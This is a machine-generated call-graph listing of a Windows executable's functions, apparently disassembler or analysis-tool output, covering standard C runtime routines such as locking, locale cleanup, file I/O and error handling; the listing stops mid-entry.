__ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 21922->21924 21923->21916 21925 40e9ae 21924->21925 21925->21899 21927 4161f7 _Fputc 21926->21927 21928 41607a _Fputc 43 API calls 21927->21928 21929 41620c 21928->21929 21930 40bbd5 _Fputc 41 API calls 21929->21930 21931 416219 21930->21931 21931->21922 21932->21912 20473 415002 20474 41500d 20473->20474 20478 41501d 20473->20478 20479 415023 20474->20479 20477 4140f1 ___free_lconv_mon 14 API calls 20477->20478 20480 41503e 20479->20480 20481 415038 20479->20481 20483 4140f1 ___free_lconv_mon 14 API calls 20480->20483 20482 4140f1 ___free_lconv_mon 14 API calls 20481->20482 20482->20480 20484 41504a 20483->20484 20485 4140f1 ___free_lconv_mon 14 API calls 20484->20485 20486 415055 20485->20486 20487 4140f1 ___free_lconv_mon 14 API calls 20486->20487 20488 415060 20487->20488 20489 4140f1 ___free_lconv_mon 14 API calls 20488->20489 20490 41506b 20489->20490 20491 4140f1 ___free_lconv_mon 14 API calls 20490->20491 20492 415076 20491->20492 20493 4140f1 ___free_lconv_mon 14 API calls 20492->20493 20494 415081 20493->20494 20495 4140f1 ___free_lconv_mon 14 API calls 20494->20495 20496 41508c 20495->20496 20497 4140f1 ___free_lconv_mon 14 API calls 20496->20497 20498 415097 20497->20498 20499 4140f1 ___free_lconv_mon 14 API calls 20498->20499 20500 4150a5 20499->20500 20505 414e4f 20500->20505 20506 414e5b __FrameHandler3::FrameUnwindToState 20505->20506 20521 40e0c6 EnterCriticalSection 20506->20521 20508 414e65 20511 4140f1 ___free_lconv_mon 14 API calls 20508->20511 20512 414e8f 20508->20512 20511->20512 20522 414eae 20512->20522 20513 414eba 20514 414ec6 __FrameHandler3::FrameUnwindToState 20513->20514 20526 40e0c6 EnterCriticalSection 20514->20526 20516 414ed0 20517 4150f0 __dosmaperr 14 API calls 20516->20517 20518 414ee3 20517->20518 20527 414f03 20518->20527 20521->20508 20525 40e10e LeaveCriticalSection 20522->20525 20524 414e9c 20524->20513 20525->20524 20526->20516 20530 40e10e LeaveCriticalSection 20527->20530 20529 414ef1 20529->20477 20530->20529 20566 40660e 20567 406622 20566->20567 20573 40667d 20567->20573 20574 405e65 20567->20574 20570 40666a 20570->20573 20586 40efa7 20570->20586 20577 405ed1 20574->20577 20578 405e80 20574->20578 20575 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20576 405ee9 20575->20576 20576->20570 20576->20573 20580 40f318 20576->20580 20577->20575 20578->20577 20579 40dcfa 69 API calls 20578->20579 20579->20577 20581 40f32b _Fputc 20580->20581 20600 40f0b7 20581->20600 20584 40bbd5 _Fputc 41 API calls 20585 40f34d 20584->20585 20585->20570 20587 40efb2 20586->20587 20588 40efc7 20586->20588 20589 40e072 __Wcrtomb 14 API calls 20587->20589 20590 40efe4 20588->20590 20591 40efcf 20588->20591 20593 40efb7 20589->20593 20629 41886b 20590->20629 20594 40e072 __Wcrtomb 14 API calls 20591->20594 20596 40df74 ___std_exception_copy 41 API calls 20593->20596 20597 40efd4 20594->20597 20595 40efdf 20595->20573 20598 40efc2 20596->20598 20599 40df74 ___std_exception_copy 41 API calls 20597->20599 20598->20573 20599->20595 20601 40f0c3 __FrameHandler3::FrameUnwindToState 20600->20601 20602 40f0c9 20601->20602 20604 40f0fd 20601->20604 20603 40def7 _Fputc 41 API calls 20602->20603 20606 40f0e4 20603->20606 20611 40bb65 EnterCriticalSection 20604->20611 20606->20584 20607 40f109 20612 40f22c 20607->20612 20609 40f120 20621 40f149 20609->20621 20611->20607 20613 40f252 20612->20613 20614 40f23f 20612->20614 20624 40f153 20613->20624 20614->20609 20616 40f275 20617 40ed28 ___scrt_uninitialize_crt 66 API calls 20616->20617 20620 40f303 20616->20620 20618 40f2a3 20617->20618 20619 418af3 __wsopen_s 43 API calls 20618->20619 20619->20620 20620->20609 20628 40bb79 LeaveCriticalSection 20621->20628 20623 40f151 20623->20606 20625 40f164 20624->20625 20626 40f1bc 20624->20626 20625->20626 20627 418ab3 __wsopen_s 43 API calls 20625->20627 20626->20616 20627->20626 20628->20623 20630 41887f _Fputc 20629->20630 20635 418280 20630->20635 20633 40bbd5 _Fputc 41 API calls 20634 418899 20633->20634 20634->20595 20636 41828c __FrameHandler3::FrameUnwindToState 20635->20636 20637 418293 20636->20637 20638 4182b6 20636->20638 20639 40def7 _Fputc 41 API calls 20637->20639 20646 40bb65 EnterCriticalSection 20638->20646 20641 4182ac 20639->20641 20641->20633 20642 4182c4 20647 41830f 20642->20647 20644 4182d3 20660 418305 20644->20660 20646->20642 20648 418346 20647->20648 20649 41831e 20647->20649 20651 414bd2 _Ungetc 41 API calls 20648->20651 20650 40def7 _Fputc 41 API calls 20649->20650 20659 418339 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20650->20659 20652 41834f 20651->20652 20663 418a95 20652->20663 20655 4183f9 20666 41866f 20655->20666 20657 418410 20657->20659 20678 4184b0 20657->20678 20659->20644 20701 40bb79 LeaveCriticalSection 20660->20701 20662 41830d 20662->20641 20685 4188ac 20663->20685 20667 41867e __wsopen_s 20666->20667 20668 414bd2 _Ungetc 41 API calls 20667->20668 20670 41869a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20668->20670 20669 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20671 418818 20669->20671 20672 418a95 45 API calls 20670->20672 20677 4186a6 20670->20677 20671->20659 20673 4186fa 20672->20673 20674 41872c ReadFile 20673->20674 20673->20677 20675 418753 20674->20675 20674->20677 20676 418a95 45 API calls 20675->20676 20676->20677 20677->20669 20679 414bd2 _Ungetc 41 API calls 20678->20679 20680 4184c3 20679->20680 20681 418a95 45 API calls 20680->20681 20683 41850b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20680->20683 20682 41855e 20681->20682 20682->20683 20684 418a95 45 API calls 20682->20684 20683->20659 20684->20683 20687 4188b8 __FrameHandler3::FrameUnwindToState 20685->20687 20686 41836d 20686->20655 20686->20657 20686->20659 20687->20686 20688 418996 20687->20688 20690 418914 20687->20690 20689 40def7 _Fputc 41 API calls 20688->20689 20689->20686 20696 41c9b3 EnterCriticalSection 20690->20696 20692 41891a 20693 41893f 20692->20693 20694 4189d2 __wsopen_s 43 API calls 20692->20694 20697 41898e 20693->20697 20694->20693 20696->20692 20700 41ca68 LeaveCriticalSection 20697->20700 20699 418994 20699->20686 20700->20699 20701->20662 22132 40bb19 22133 40edf6 ___scrt_uninitialize_crt 70 API calls 22132->22133 22134 40bb21 22133->22134 22142 4148f5 22134->22142 22136 40bb26 22137 4149a0 14 API calls 22136->22137 22138 40bb35 DeleteCriticalSection 22137->22138 22138->22136 22139 40bb50 22138->22139 22140 4140f1 ___free_lconv_mon 14 API calls 22139->22140 22141 40bb5b 22140->22141 22143 414901 __FrameHandler3::FrameUnwindToState 22142->22143 22152 40e0c6 EnterCriticalSection 22143->22152 22145 414978 22153 414997 22145->22153 22147 41490c 22147->22145 22149 41494c DeleteCriticalSection 22147->22149 22151 40bd99 71 API calls 22147->22151 22150 4140f1 ___free_lconv_mon 14 API calls 22149->22150 22150->22147 22151->22147 22152->22147 22156 40e10e LeaveCriticalSection 22153->22156 22155 414984 22155->22136 22156->22155 22170 417f20 22171 417f44 22170->22171 22172 417f2f 22170->22172 22176 417fa2 22171->22176 22177 418105 _Ungetc 14 API calls 22171->22177 22184 417f3f 22171->22184 22173 40e072 __Wcrtomb 14 API calls 22172->22173 22174 417f34 22173->22174 22175 40df74 ___std_exception_copy 41 API calls 22174->22175 22175->22184 22178 414bd2 _Ungetc 41 API calls 22176->22178 22177->22176 22179 417fd2 22178->22179 22190 42211e 22179->22190 22182 414bd2 _Ungetc 41 API calls 22183 418014 22182->22183 22183->22184 22185 414bd2 _Ungetc 41 API calls 22183->22185 22186 418022 22185->22186 22186->22184 22187 414bd2 _Ungetc 41 API calls 22186->22187 22188 418030 22187->22188 22189 414bd2 _Ungetc 41 API calls 22188->22189 22189->22184 22191 42212a __FrameHandler3::FrameUnwindToState 22190->22191 22192 422132 22191->22192 22193 42214a 22191->22193 22195 40e05f __dosmaperr 14 API calls 22192->22195 22194 422207 22193->22194 22198 422180 22193->22198 22196 40e05f __dosmaperr 14 API calls 22194->22196 22197 422137 22195->22197 22199 42220c 22196->22199 22200 40e072 __Wcrtomb 14 API calls 22197->22200 22201 422189 22198->22201 22202 42219e 22198->22202 22203 40e072 __Wcrtomb 14 API calls 22199->22203 22219 417fda 22200->22219 22204 40e05f __dosmaperr 14 API calls 22201->22204 22220 41c9b3 EnterCriticalSection 22202->22220 22206 422196 22203->22206 22207 42218e 22204->22207 22212 40df74 ___std_exception_copy 41 API calls 22206->22212 22209 40e072 __Wcrtomb 14 API calls 22207->22209 22208 4221a4 22210 4221c0 22208->22210 22211 4221d5 22208->22211 22209->22206 22214 40e072 __Wcrtomb 14 API calls 22210->22214 22213 422232 __wsopen_s 53 API calls 22211->22213 22212->22219 22215 4221d0 22213->22215 22216 4221c5 22214->22216 22221 4221ff 22215->22221 22217 40e05f __dosmaperr 14 API calls 22216->22217 22217->22215 22219->22182 22219->22184 22220->22208 22224 41ca68 LeaveCriticalSection 22221->22224 22223 422205 22223->22219 22224->22223 20834 40683d 20835 406849 __EH_prolog3_GS 20834->20835 20837 406898 20835->20837 20841 406860 20835->20841 20845 4068b2 20835->20845 20848 4059c4 20837->20848 20881 4076f4 20841->20881 20844 406961 20876 403f30 20844->20876 20845->20844 20847 40699c 20845->20847 20851 403f80 20845->20851 20856 40ee9b 20845->20856 20847->20844 20884 40f649 20847->20884 20897 40e588 20848->20897 20852 403fa7 20851->20852 20853 403f89 20851->20853 20854 404420 43 API calls 20852->20854 20853->20845 20855 403fbb 20854->20855 20855->20845 20857 40eea7 __FrameHandler3::FrameUnwindToState 20856->20857 20858 40eeb1 20857->20858 20859 40eec9 20857->20859 20861 40e072 __Wcrtomb 14 API calls 20858->20861 20981 40bb65 EnterCriticalSection 20859->20981 20863 40eeb6 20861->20863 20862 40eed3 20864 40ef6f 20862->20864 20866 414bd2 _Ungetc 41 API calls 20862->20866 20865 40df74 ___std_exception_copy 41 API calls 20863->20865 20982 40ee54 20864->20982 20870 40eec1 20865->20870 20872 40eef0 20866->20872 20868 40ef75 20989 40ef9f 20868->20989 20870->20845 20871 40ef47 20873 40e072 __Wcrtomb 14 API calls 20871->20873 20872->20864 20872->20871 20874 40ef4c 20873->20874 20875 40df74 ___std_exception_copy 41 API calls 20874->20875 20875->20870 20877 403f3b 20876->20877 20878 403f56 std::ios_base::_Ios_base_dtor 20876->20878 20877->20878 20879 40df84 std::ios_base::_Init 41 API calls 20877->20879 20878->20841 20880 403f7a 20879->20880 20882 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20881->20882 20883 4076fe 20882->20883 20883->20883 20885 40f655 __FrameHandler3::FrameUnwindToState 20884->20885 20886 40f671 20885->20886 20887 40f65c 20885->20887 20993 40bb65 EnterCriticalSection 20886->20993 20889 40e072 __Wcrtomb 14 API calls 20887->20889 20891 40f661 20889->20891 20890 40f67b 20994 40f550 20890->20994 20893 40df74 ___std_exception_copy 41 API calls 20891->20893 20895 40f66c 20893->20895 20895->20847 20898 40e594 __FrameHandler3::FrameUnwindToState 20897->20898 20899 40e5b2 20898->20899 20900 40e59b 20898->20900 20910 40bb65 EnterCriticalSection 20899->20910 20901 40e072 __Wcrtomb 14 API calls 20900->20901 20903 40e5a0 20901->20903 20905 40df74 ___std_exception_copy 41 API calls 20903->20905 20904 40e5be 20911 40e418 20904->20911 20907 4059cf 20905->20907 20907->20841 20908 40e5c9 20945 40e5f7 20908->20945 20910->20904 20912 40e435 20911->20912 20913 40e49b 20911->20913 20914 414bd2 _Ungetc 41 API calls 20912->20914 20916 414bd2 _Ungetc 41 API calls 20913->20916 20929 40e492 20913->20929 20915 40e43b 20914->20915 20917 414bd2 _Ungetc 41 API calls 20915->20917 20920 40e45e 20915->20920 20919 40e4b0 20916->20919 20921 40e447 20917->20921 20918 40e4d3 20923 40ee90 41 API calls 20918->20923 20918->20929 20919->20918 20922 414bd2 _Ungetc 41 API calls 20919->20922 20920->20913 20928 40e479 20920->20928 20921->20920 20927 414bd2 _Ungetc 41 API calls 20921->20927 20924 40e4bc 20922->20924 20926 40e4f3 20923->20926 20924->20918 20931 414bd2 _Ungetc 41 API calls 20924->20931 20926->20929 20932 40f704 __Getctype 41 API calls 20926->20932 20930 40e453 20927->20930 20928->20929 20948 40ee90 20928->20948 20929->20908 20933 414bd2 _Ungetc 41 API calls 20930->20933 20934 40e4c8 20931->20934 20935 40e50b 20932->20935 20933->20920 20936 414bd2 _Ungetc 41 API calls 20934->20936 20937 40e535 20935->20937 20939 40ee90 41 API calls 20935->20939 20936->20918 20955 416351 20937->20955 20941 40e51c 20939->20941 20941->20937 20942 40e522 20941->20942 20944 40f649 43 API calls 20942->20944 20943 40e072 __Wcrtomb 14 API calls 20943->20929 20944->20929 20980 40bb79 LeaveCriticalSection 20945->20980 20947 40e5fd 20947->20907 20949 40ee54 20948->20949 20950 40e072 __Wcrtomb 14 API calls 20949->20950 20952 40ee75 20949->20952 20951 40ee65 20950->20951 20953 40df74 ___std_exception_copy 41 API calls 20951->20953 20952->20928 20954 40ee70 20953->20954 20954->20928 20956 416364 _Fputc 20955->20956 20961 41621e 20956->20961 20959 40bbd5 _Fputc 41 API calls 20960 40e549 20959->20960 20960->20929 20960->20943 20962 416232 20961->20962 20971 416242 20961->20971 20963 416267 20962->20963 20964 40d730 _Fputc 41 API calls 20962->20964 20962->20971 20965 416278 20963->20965 20966 41629b 20963->20966 20964->20963 20973 421a85 20965->20973 20968 4162c3 20966->20968 20969 416317 20966->20969 20966->20971 20968->20971 20972 41b00f __wsopen_s MultiByteToWideChar 20968->20972 20970 41b00f __wsopen_s MultiByteToWideChar 20969->20970 20970->20971 20971->20959 20972->20971 20976 423fd4 20973->20976 20979 423fff _Fputc 20976->20979 20977 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20978 421aa0 20977->20978 20978->20971 20979->20977 20980->20947 20981->20862 20983 40ee60 20982->20983 20984 40ee75 20982->20984 20985 40e072 __Wcrtomb 14 API calls 20983->20985 20984->20868 20986 40ee65 20985->20986 20987 40df74 ___std_exception_copy 41 API calls 20986->20987 20988 40ee70 20987->20988 20988->20868 20992 40bb79 LeaveCriticalSection 20989->20992 20991 40efa5 20991->20870 20992->20991 20993->20890 20995 40f568 20994->20995 21002 40f5d8 20994->21002 20996 414bd2 _Ungetc 41 API calls 20995->20996 20999 40f56e 20996->20999 20998 40f5c0 21000 40e072 __Wcrtomb 14 API calls 20998->21000 20999->20998 20999->21002 21003 40f5c5 21000->21003 21001 40f5d0 21005 40f6b4 21001->21005 21002->21001 21008 418105 21002->21008 21004 40df74 ___std_exception_copy 41 API calls 21003->21004 21004->21001 21013 40bb79 LeaveCriticalSection 21005->21013 21007 40f6ba 21007->20895 21009 414094 __dosmaperr 14 API calls 21008->21009 21010 418122 21009->21010 21011 4140f1 ___free_lconv_mon 14 API calls 21010->21011 21012 41812c 21011->21012 21012->21001 21013->21007 21085 4060d1 21086 406124 21085->21086 21087 4060d8 21085->21087 21090 40bb65 EnterCriticalSection 21087->21090 21089 4060dd 21090->21089 21309 411aed 21312 4117b9 21309->21312 21313 4117c5 __FrameHandler3::FrameUnwindToState 21312->21313 21320 40e0c6 EnterCriticalSection 21313->21320 21315 4117fd 21321 41181b 21315->21321 21316 4117cf 21316->21315 21318 41dcc6 __Getctype 14 API calls 21316->21318 21318->21316 21320->21316 21324 40e10e LeaveCriticalSection 21321->21324 21323 411809 21324->21323 17349 413ef2 17354 413cc8 17349->17354 17352 413f31 17355 413ce7 17354->17355 17356 413cfa 17355->17356 17364 413d0f 17355->17364 17374 40e072 17356->17374 17360 413d0a 17360->17352 17371 41fe8c 17360->17371 17361 40e072 __Wcrtomb 14 API calls 17362 413ee0 17361->17362 17363 40df74 ___std_exception_copy 41 API calls 17362->17363 17363->17360 17364->17364 17369 413e2f 17364->17369 17380 41f71e 17364->17380 17366 413e7f 17367 41f71e 41 API calls 17366->17367 17366->17369 17368 413e9d 17367->17368 17368->17369 17370 41f71e 41 API calls 17368->17370 17369->17360 17369->17361 17370->17369 17906 41f856 17371->17906 17394 41528c GetLastError 17374->17394 17376 40e077 17377 40df74 17376->17377 17615 40dec0 17377->17615 17381 41f775 17380->17381 17382 41f72d 17380->17382 17829 41f78b 17381->17829 17383 41f733 17382->17383 17386 41f750 17382->17386 17385 40e072 __Wcrtomb 14 API calls 17383->17385 17388 41f738 17385->17388 17390 40e072 __Wcrtomb 14 API calls 17386->17390 17393 41f76e 17386->17393 17387 41f743 17387->17366 17389 40df74 ___std_exception_copy 41 API calls 17388->17389 17389->17387 17391 41f75f 17390->17391 17392 40df74 ___std_exception_copy 41 API calls 17391->17392 17392->17387 17393->17366 17395 4152a2 17394->17395 17396 4152a8 17394->17396 17417 4145dd 17395->17417 17414 4152ac SetLastError 17396->17414 17422 41461c 17396->17422 17402 4152d9 17403 4152e1 17402->17403 17404 4152f2 17402->17404 17405 41461c __dosmaperr 6 API calls 17403->17405 17406 41461c __dosmaperr 6 API calls 17404->17406 17407 4152ef 17405->17407 17408 4152fe 17406->17408 17434 4140f1 17407->17434 17409 415302 17408->17409 17410 415319 17408->17410 17411 41461c __dosmaperr 6 API calls 17409->17411 17440 414f69 17410->17440 17411->17407 17414->17376 17416 4140f1 ___free_lconv_mon 12 API calls 17416->17414 17445 4143cc 17417->17445 17419 4145f9 17420 414602 17419->17420 17421 414614 TlsGetValue 17419->17421 17420->17396 17423 4143cc std::_Lockit::_Lockit 5 API calls 17422->17423 17424 414638 17423->17424 17425 414641 17424->17425 17426 414656 TlsSetValue 17424->17426 17425->17414 17427 414094 17425->17427 17432 4140a1 __dosmaperr 17427->17432 17428 4140e1 17431 40e072 __Wcrtomb 13 API calls 17428->17431 17429 4140cc HeapAlloc 17430 4140df 17429->17430 17429->17432 17430->17402 17431->17430 17432->17428 17432->17429 17459 412e98 17432->17459 17435 414126 17434->17435 17436 4140fc HeapFree 17434->17436 17435->17414 17436->17435 17437 414111 GetLastError 17436->17437 17438 41411e __dosmaperr 17437->17438 17439 40e072 __Wcrtomb 12 API calls 17438->17439 17439->17435 17473 414dfd 17440->17473 17446 4143fa 17445->17446 17450 4143f6 std::_Lockit::_Lockit 17445->17450 17446->17450 17451 414301 17446->17451 17449 414414 GetProcAddress 17449->17450 17450->17419 17457 414312 ___vcrt_FlsGetValue 17451->17457 17452 4143a8 17452->17449 17452->17450 17453 414330 LoadLibraryExW 17454 41434b GetLastError 17453->17454 17455 4143af 17453->17455 17454->17457 17455->17452 17456 4143c1 FreeLibrary 17455->17456 17456->17452 17457->17452 17457->17453 17458 41437e LoadLibraryExW 17457->17458 17458->17455 17458->17457 17462 412ec5 17459->17462 17463 412ed1 __FrameHandler3::FrameUnwindToState 17462->17463 17468 40e0c6 EnterCriticalSection 17463->17468 17465 412edc 17469 412f18 17465->17469 17468->17465 17472 40e10e LeaveCriticalSection 17469->17472 17471 412ea3 17471->17432 17472->17471 17474 414e09 __FrameHandler3::FrameUnwindToState 17473->17474 17487 40e0c6 EnterCriticalSection 17474->17487 17476 414e13 17488 414e43 17476->17488 17479 414f0f 17480 414f1b __FrameHandler3::FrameUnwindToState 17479->17480 17492 40e0c6 EnterCriticalSection 17480->17492 17482 414f25 17493 4150f0 17482->17493 17484 414f3d 17497 414f5d 17484->17497 17487->17476 17491 40e10e LeaveCriticalSection 17488->17491 17490 414e31 17490->17479 17491->17490 17492->17482 17494 415126 __Getctype 17493->17494 17495 4150ff __Getctype 17493->17495 17494->17484 17495->17494 17500 41d9f9 17495->17500 17614 40e10e LeaveCriticalSection 17497->17614 17499 414f4b 17499->17416 17501 41da79 17500->17501 17503 41da0f 17500->17503 17504 4140f1 ___free_lconv_mon 14 API calls 17501->17504 17526 41dac7 17501->17526 17503->17501 17508 41da42 17503->17508 17510 4140f1 ___free_lconv_mon 14 API calls 17503->17510 17505 41da9b 17504->17505 17506 4140f1 ___free_lconv_mon 14 API calls 17505->17506 17507 41daae 17506->17507 17512 4140f1 ___free_lconv_mon 14 API calls 17507->17512 17513 4140f1 ___free_lconv_mon 14 API calls 17508->17513 17527 41da64 17508->17527 17509 4140f1 ___free_lconv_mon 14 API calls 17514 41da6e 17509->17514 17516 41da37 17510->17516 17511 41dad5 17515 41db35 17511->17515 17525 4140f1 14 API calls ___free_lconv_mon 17511->17525 17517 41dabc 17512->17517 17518 41da59 17513->17518 17519 4140f1 ___free_lconv_mon 14 API calls 17514->17519 17520 4140f1 ___free_lconv_mon 14 API calls 17515->17520 17528 41ccaf 17516->17528 17522 4140f1 ___free_lconv_mon 14 API calls 17517->17522 17556 41d163 17518->17556 17519->17501 17524 41db3b 17520->17524 17522->17526 17524->17494 17525->17511 17568 41db6a 17526->17568 17527->17509 17529 41ccc0 17528->17529 17555 41cda9 17528->17555 17530 41ccd1 17529->17530 17531 4140f1 ___free_lconv_mon 14 API calls 17529->17531 17532 41cce3 17530->17532 17533 4140f1 ___free_lconv_mon 14 API calls 17530->17533 17531->17530 17534 41ccf5 17532->17534 17535 4140f1 ___free_lconv_mon 14 API calls 17532->17535 17533->17532 17536 41cd07 17534->17536 17538 4140f1 ___free_lconv_mon 14 API calls 17534->17538 17535->17534 17537 41cd19 17536->17537 17539 4140f1 ___free_lconv_mon 14 API calls 17536->17539 17540 41cd2b 17537->17540 17541 4140f1 ___free_lconv_mon 14 API calls 17537->17541 17538->17536 17539->17537 17542 4140f1 ___free_lconv_mon 14 API calls 17540->17542 17544 41cd3d 17540->17544 17541->17540 17542->17544 17543 41cd4f 17545 41cd61 17543->17545 17547 4140f1 ___free_lconv_mon 14 API calls 17543->17547 17544->17543 17546 4140f1 ___free_lconv_mon 14 API calls 17544->17546 17548 41cd73 17545->17548 17549 4140f1 ___free_lconv_mon 14 API calls 17545->17549 17546->17543 17547->17545 17550 41cd85 17548->17550 17551 4140f1 ___free_lconv_mon 14 API calls 17548->17551 17549->17548 17552 41cd97 17550->17552 17553 4140f1 ___free_lconv_mon 14 API calls 17550->17553 17551->17550 17554 4140f1 ___free_lconv_mon 14 API calls 17552->17554 17552->17555 17553->17552 17554->17555 17555->17508 17557 41d170 17556->17557 17558 41d1c8 17556->17558 17559 41d180 17557->17559 17560 4140f1 ___free_lconv_mon 14 API calls 17557->17560 17558->17527 17561 41d192 17559->17561 17562 4140f1 ___free_lconv_mon 14 API calls 17559->17562 17560->17559 17563 41d1a4 17561->17563 17565 4140f1 ___free_lconv_mon 14 API calls 17561->17565 17562->17561 17564 41d1b6 17563->17564 17566 4140f1 ___free_lconv_mon 14 API calls 17563->17566 17564->17558 17567 4140f1 ___free_lconv_mon 14 API calls 17564->17567 17565->17563 17566->17564 17567->17558 17569 41db77 17568->17569 17570 41db96 17568->17570 17569->17570 17574 41d67e 17569->17574 17570->17511 17573 4140f1 ___free_lconv_mon 14 API calls 17573->17570 17575 41d75c 17574->17575 17576 41d68f 17574->17576 17575->17573 17610 41d3dd 17576->17610 17579 41d3dd __Getctype 14 API calls 17580 41d6a2 17579->17580 17581 41d3dd __Getctype 14 API calls 17580->17581 17582 41d6ad 17581->17582 17583 41d3dd __Getctype 14 API calls 17582->17583 17584 41d6b8 17583->17584 17585 41d3dd __Getctype 14 API calls 17584->17585 17586 41d6c6 17585->17586 17587 4140f1 ___free_lconv_mon 14 API calls 17586->17587 17588 41d6d1 17587->17588 17589 4140f1 ___free_lconv_mon 14 API calls 17588->17589 17590 41d6dc 17589->17590 17591 4140f1 ___free_lconv_mon 14 API calls 17590->17591 17592 41d6e7 17591->17592 17611 41d3ef 17610->17611 17612 41d3fe 17611->17612 17613 4140f1 ___free_lconv_mon 14 API calls 17611->17613 17612->17579 17613->17611 17614->17499 17616 40ded2 _Fputc 17615->17616 17621 40def7 17616->17621 17618 40deea 17632 40bbd5 17618->17632 17622 40df07 17621->17622 17624 40df0e 17621->17624 17638 40bd36 GetLastError 17622->17638 17629 40df1c 17624->17629 17642 40dd4f 17624->17642 17626 40df43 17626->17629 17645 40dfa1 IsProcessorFeaturePresent 17626->17645 17628 40df73 17630 40dec0 ___std_exception_copy 41 API calls 17628->17630 17629->17618 17631 40df80 17630->17631 17631->17618 17633 40bbe1 17632->17633 17635 40bbf8 17633->17635 17685 40bd7c 17633->17685 17636 40bd7c _Fputc 41 API calls 17635->17636 17637 40bc0b 17635->17637 17636->17637 17637->17360 17639 40bd4f 17638->17639 17649 41533d 17639->17649 17643 40dd73 17642->17643 17644 40dd5a GetLastError SetLastError 17642->17644 17643->17626 17644->17626 17646 40dfad 17645->17646 17671 40dd78 17646->17671 17650 415350 17649->17650 17651 415356 17649->17651 17652 4145dd __dosmaperr 6 API calls 17650->17652 17653 41461c __dosmaperr 6 API calls 17651->17653 17670 40bd67 SetLastError 17651->17670 17652->17651 17654 415370 17653->17654 17655 414094 __dosmaperr 14 API calls 17654->17655 17654->17670 17656 415380 17655->17656 17657 415388 17656->17657 17658 41539d 17656->17658 17659 41461c __dosmaperr 6 API calls 17657->17659 17660 41461c __dosmaperr 6 API calls 17658->17660 17667 415394 17659->17667 17661 4153a9 17660->17661 17662 4153ad 17661->17662 17663 4153bc 17661->17663 17665 41461c __dosmaperr 6 API calls 17662->17665 17666 414f69 __dosmaperr 14 API calls 17663->17666 17664 4140f1 ___free_lconv_mon 14 API calls 17664->17670 17665->17667 17668 4153c7 17666->17668 17667->17664 17669 4140f1 ___free_lconv_mon 14 API calls 17668->17669 17669->17670 17670->17624 17672 40dd94 CallUnexpected codecvt 17671->17672 17673 40ddc0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17672->17673 17676 40de91 CallUnexpected 17673->17676 17675 40deaf GetCurrentProcess TerminateProcess 17675->17628 17677 407420 17676->17677 17678 407428 17677->17678 17679 407429 IsProcessorFeaturePresent 17677->17679 17678->17675 17681 407db2 17679->17681 17684 407d75 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17681->17684 17683 407e95 17683->17675 17684->17683 17686 40bd86 17685->17686 17687 40bd8f 17685->17687 17688 40bd36 _Fputc 16 API calls 17686->17688 17687->17635 17689 40bd8b 17688->17689 17689->17687 17692 40e13c 17689->17692 17703 4174ae 17692->17703 17695 40e14c 17697 40e156 IsProcessorFeaturePresent 17695->17697 17698 40e175 17695->17698 17700 40e162 17697->17700 17733 411577 17698->17733 17702 40dd78 CallUnexpected 8 API calls 17700->17702 17702->17698 17736 4173e0 17703->17736 17706 4174f3 17707 4174ff __FrameHandler3::FrameUnwindToState 17706->17707 17708 41528c __dosmaperr 14 API calls 17707->17708 17712 41752c CallUnexpected 17707->17712 17715 417526 CallUnexpected 17707->17715 17708->17715 17709 417573 17711 40e072 __Wcrtomb 14 API calls 17709->17711 17710 41755d 17710->17695 17713 417578 17711->17713 17714 41759f 17712->17714 17747 40e0c6 EnterCriticalSection 17712->17747 17716 40df74 ___std_exception_copy 41 API calls 17713->17716 17719 4175e1 17714->17719 17720 4176d2 17714->17720 17730 417610 17714->17730 17715->17709 17715->17710 17715->17712 17716->17710 17719->17730 17748 41513b GetLastError 17719->17748 17721 4176dd 17720->17721 17779 40e10e LeaveCriticalSection 17720->17779 17724 411577 CallUnexpected 23 API calls 17721->17724 17725 4176e5 17724->17725 17727 41513b __Getctype 41 API calls 17731 417665 17727->17731 17729 41513b __Getctype 41 API calls 17729->17730 17775 41767f 17730->17775 17731->17710 17732 41513b __Getctype 41 API calls 17731->17732 17732->17710 17781 41139b 17733->17781 17737 4173ec __FrameHandler3::FrameUnwindToState 17736->17737 17742 40e0c6 EnterCriticalSection 17737->17742 17739 4173fa 17743 417438 17739->17743 17742->17739 17746 40e10e LeaveCriticalSection 17743->17746 17745 40e141 17745->17695 17745->17706 17746->17745 17747->17714 17749 415151 17748->17749 17750 415157 17748->17750 17752 4145dd __dosmaperr 6 API calls 17749->17752 17751 41461c __dosmaperr 6 API calls 17750->17751 17754 41515b SetLastError 17750->17754 17753 415173 17751->17753 17752->17750 17753->17754 17756 414094 __dosmaperr 14 API calls 17753->17756 17758 4151f0 17754->17758 17759 4151eb 17754->17759 17757 415188 17756->17757 17760 4151a1 17757->17760 17761 415190 17757->17761 17762 40e13c CallUnexpected 39 API calls 17758->17762 17759->17729 17764 41461c __dosmaperr 6 API calls 17760->17764 17763 41461c __dosmaperr 6 API calls 17761->17763 17765 4151f5 17762->17765 17766 41519e 17763->17766 17767 4151ad 17764->17767 17770 4140f1 ___free_lconv_mon 14 API calls 17766->17770 17768 4151b1 17767->17768 17769 4151c8 17767->17769 17772 41461c __dosmaperr 6 API calls 17768->17772 17771 414f69 __dosmaperr 14 API calls 17769->17771 17770->17754 17773 4151d3 17771->17773 17772->17766 17774 4140f1 ___free_lconv_mon 14 API calls 17773->17774 17774->17754 17776 417685 17775->17776 17777 417656 17775->17777 17780 40e10e LeaveCriticalSection 17776->17780 17777->17710 17777->17727 17777->17731 17779->17721 17780->17777 17782 4113c8 17781->17782 17783 4113da 17781->17783 17808 411463 GetModuleHandleW 17782->17808 17793 411263 17783->17793 17788 40e17f 17794 41126f __FrameHandler3::FrameUnwindToState 17793->17794 17816 40e0c6 EnterCriticalSection 17794->17816 17796 411279 17817 4112b0 17796->17817 17798 411286 17821 4112a4 17798->17821 17801 411432 17824 4114a6 17801->17824 17804 411450 17806 